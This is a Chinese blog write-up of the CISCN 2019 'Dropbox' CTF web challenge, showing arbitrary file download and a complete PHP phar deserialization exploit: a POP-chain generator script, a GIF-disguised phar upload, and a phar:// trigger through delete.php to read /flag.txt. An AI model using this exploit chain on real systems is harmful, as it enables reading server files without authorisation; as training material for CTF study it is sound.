ciscn_2019_web_northern_china_day1_web1解题思路

已于 2023-11-20 20:10:40 修改
阅读量93 收藏
点赞数
文章标签: 安全
于 2023-11-20 20:10:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AA15744/article/details/134517201
版权

题目:

一.注册用户

用户名:admin 密码 admin

二.随便上传(是否有文件上传漏洞)

三.有下载功能(bp抓包一下)

四.有文件下载漏洞(下载index.php,class.php,download.php,delete.php)

题目标签提示是一道反序列化的题目,但是没有找到明显的可以输入序列化数据的地方。

我们了解一下另一种利用反序列化的手段:phar反序列化。

必须要看这篇文章。

https://xz.aliyun.com/t/2715

本题是否符合phar反序列化的条件?

1. phar文件要能够上传到服务器端。
如file_exists(),fopen(),file_get_contents(),file()等文件操作的函数
2. 要有可用的魔术方法作为“跳板”。
3. 文件操作函数的参数可控,且:、/、phar等特殊字符没有被过滤。

五.造pop链和phar反序列化。提取一下class.php中的要用的方法。

class User {
    public $db;
    public function __destruct() {
        $this->db->close();
    }
}
class FileList {
    private $files;
    private $results;
    private $funcs;
 
    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);
 
        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);
 
        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }
 
    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }
 
}
class File {
    public $filename;
    public function close() {
        return file_get_contents($this->filename);
    }
}

 char.php

<?php
    class User {
        public $db;
    }
    class File {
        public $filename;
    }
    class FileList {
        private $files;
        private $results;
        private $funcs;
        public function __construct() {
            $this->files = array();
            $this->results = array();
            $this->funcs = array();
            
            $file = new File();
            $file->filename = '/flag.txt';    
            array_push($this->files, $file);
        }
    }
 
    $user = new User();
    $filelist = new FileList();
    $user->db = $filelist;
 
    $phar = new Phar("phar.phar"); 
    $phar->startBuffering();
    $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");  
    $phar->setMetadata($user); 
    $phar->addFromString("123.txt", "123"); 
    $phar->stopBuffering();
?>

执行之后回生成一个.phar文件,但是执行前需要

将php.ini中的phar.readonly选项设置为Off,否则无法生成phar文件。
修改php.ini后,执行phar.php。在同目录下生成了一个phar.phar文件。


将其改名为phar.gif


上传。


该怎么利用?

在download.php中有这么一条语句。

ini_set("open_basedir", getcwd() . ":/etc:/tmp");
说明

只可以访问当前目录、/etc和/tmp三个目录

还好我们可以在delete.php的删除功能下操作。

点击删除,burp抓包,修改filename为: phar://phar.gif

AA15744
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[CISCN2019 华北赛区 Day1 Web5]CyberPunk题解
lonmar的博客
02-02 893
前言 考察二次注入 有关这方面总结: 网鼎杯2018-commit题解&二次注入&addslashes安全问题&insert注入 题解 根据提示,读取代码 然后把代码都读出来,进行审计.在change.php,发现了address仅用addslashes进行处理,而且插入数据库中的address会在下次查询中插入到新的dal语句中,存在二次注入 然后尝试下MySQL insert语句特性 所以可以尝试构造payload: address=’,`address`=(sql语句.
[CISCN2019 华北赛区 Day1 Web1]Dropbox
yym68686
08-11 344
[CISCN2019 华北赛区 Day1 Web1]Dropbox 注册后进入网站,上传文件后,用Burp Suite拦截请求,修改请求,任意文件可下载: POST /download.php HTTP/1.1 Host: 3a15d220-2508-43a9-a971-ff055bdaf52f.node4.buuoj.cn Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=71e4c77c7af3596b74ed78af4c
审计练习10——[CISCN2019 华北赛区 Day1 Web1]Dropbox
qq_43756333的博客
06-02 305
平台:buuoj.cn 打开靶机注册登录之后是一个管理面板,有上传功能 上传文件试试看 可以下载,抓个包有任意文件下载 把文件都下下来 考点 phar反序列化 class.php中定义了三个类:User,Filelist,File User类中除了三个用户处理函数外,在结束对象时会自动执行__destruct函数调用close() Filelist类中存在一个特别的魔术方法,__call() PHP5 的对象新增了一个专用方法 __call(),这个方法用来监视一个对象中的其它方法。如果你试着调
解:[CISCN 2019华北Day1]Web1--TLS_预备队任务(1)
river_mouth_man的博客
03-10 460
phar反序列化
BUUCTF ciscn_2019_c_1(64位ret2libc3)
Rt1Text的博客
04-10 4509
1.checksec+运行 64位/NX保护 运行起来貌似很有意思,是一个加解密操作 后来发现只能加密不能解密 2. 强大的IDA进行中 1.main函数 貌似看不出什么 2.encrypt函数 加密具体操作 大小写字母/数字进行异或运算 发现gets()栈溢出 s大小0x50 需要先把加密函数绕过 该函数的功能就是循环对输入的字符串进行加密,在加密前都有一个检查,只要v0的值大于或等于字符串的长度就跳出循环,通过strlen来计算字符串长度的,strlen计算字.
Mini_USB管脚定义.doc
02-24
3. USB 是 Universal Serial Bus 的缩写,由 Compaq, Digital, IBM, Intel, Microsoft, NEC, Northern Telecom 联合推出。它是一种通用的串行总线,用于连接计算机和外设。 4. USB 引脚定义: * Pin 1: VCC (+5 ...
embark_day_presentation_-_final.pdf
11-24
在"Embark Day"的最终演示文稿中,我们可以了解到该公司在全球范围内的战略布局以及其独特的商业模式。 自动驾驶技术是当前汽车行业的热点,Embark致力于通过先进的算法、传感器融合和机器学习技术,为长途运输提供...
northern_territory:北领地开发应用
04-14
获取澳大利亚北领地的开发应用程序,该应用程序涵盖整个州的规划应用程序。
2020_2021学年高中英语Unit1GreatscientistsLearningaboutlanguage课时作业2新人教
09-09
"The UK____ Great Britain and Northern Ireland",这里"consist of"与"The UK"为主动关系,因此使用现在分词"consisting of"作后置定语,表示主动和正在进行的动作。同时,固定短语"be famous for..."表示因…而...
2019_2020学年新教材高中英语Unit6EarthfirstSectionⅢDevelopingideasPresenti
09-09
1. **语法填空**:这部分主要考察了学生的语法运用能力,包括动词的时态、非谓语动词、名词的复数形式等。例如,"The majority (major) of them take an online language test before starting their programme." 这...
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn2019华北赛区半决赛day1_web1题解
weixin_30776273的博客
08-07 447
感谢buuoj的大佬们搭建的复现环境。作为一位CTF的初学者,我会把每个题目的writeup都写的尽量详细,希望能帮到后面的初学者。 http://web42.buuoj.cn 文章会不定时继续完善,完善内容可能包括分析的错误、语病和文章结构等。 复现过程 进入解题页面发现需要登录,这里只需要注册一个账号然后登录即可。 登录以后是一个网盘的页面,最开始只有上传功能,并且只能上传pn...
[CISCN2019 总决赛 Day2 Web1]Easyweb1
Mrs_H的博客
10-22 495
一.前言 在之前的文章中我提到最近一直在做sql注入相关的东西,也在一直做sql注入有关的题目。但是,事实上很多赛题他们的考点并不单一,往往需要结合着其他的知识,才能够拿到想要的结果。下面这道题就是我刚才所说的典型,虽然考的不难,但是足够说明当前sql题目的走向了。 二.正文 我们首先打开环境看到如下页面。 emmm,一个花里胡哨的登陆界面。尝试输入了很多用户名和密码组合,但是都不对。那就去扫一下目录,发现该网站存在一个robots.txt 这个robots文件中的内容就是在提示我们,该网站含有备份文件
[CISCN2019 总决赛 Day2 Web1]Easyweb
pakho_C的博客
09-11 836
访问,尝试id为1,2,3时都有图片,其他均没有显示,猜测盲注,尝试异或id=0^1和 0 ^ 0 无反应,换思路,扫描路径扫到敏感文件robots.txt,访问。这时的反斜杠\会将第二个单引号转义,使其变为普通字符,也就是说第一个单引号此时与第三个单引号闭合,id参数对应的值为。后缀成功绕过,但是它回显的并不是我上传文件的路径,而是上传文件的日志记录的路径。$id 变量 用于接收get型参数id的值,如果没有id参数将设置为1。,因为是字符串,所以反斜杠为转义字符,id会被解析为。
ciscn_2019_c_1
qq_45913417的博客
11-18 8710
经典ret2libc,着实恶心到我了。前后捣鼓了将近3、4个小时,勉强把原理理解透彻。 边做题边C语言:艹! 输入字符串s加密逻辑: 1、如果是小写字母跟0xD异或 2、如果是大写字母跟0xE异或 3、如果是数字跟0xF异或 [ASCII码对照表]:(http://c.biancheng.net/c/ascii/) LibcSearcher工具:https://github.com/dev2ero/LibcSearcher from pwn import * from LibcSearcher i
CTFd之CISCN 华北赛区 Day1 Web2题目复现
weixin_43075257的博客
07-15 1393
知识点: 薅羊毛与逻辑漏洞 cookie伪造 python反序列化
CISCN 华北赛区 Day1 Web2
kid的博客
06-14 2573
CISCN 华北赛区 Day1 Web2 前言 关注大佬的博客看到大佬又做了一道有意思的题还提供了环境,这里来体验下。 一看这个网站就很有意思…最近黑kunkun的可真多,前面0708那个漏洞github搜exp,下下来一运行 ,输出你打篮球真的很像CXK…过分…你打篮球才像CXK,你们全家打篮球都像CXK! 复现环境:https://github.com/CTFTraining/CISCN...
Data too long for column 'name' at row 1
最新发布
04-05
This error message typically occurs when the length of the data being inserted into a column exceeds the maximum length specified for that column in the database schema. For example, if the 'name' column in a table is defined as VARCHAR(50), meaning it can store a maximum of 50 characters, and you try to insert a name that is longer than 50 characters, you will get the "Data too long for column 'name' at row 1" error. To fix this error, you can either truncate the data being inserted so it fits within the maximum length of the column, or you can modify the column definition in the database schema to allow for longer data.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值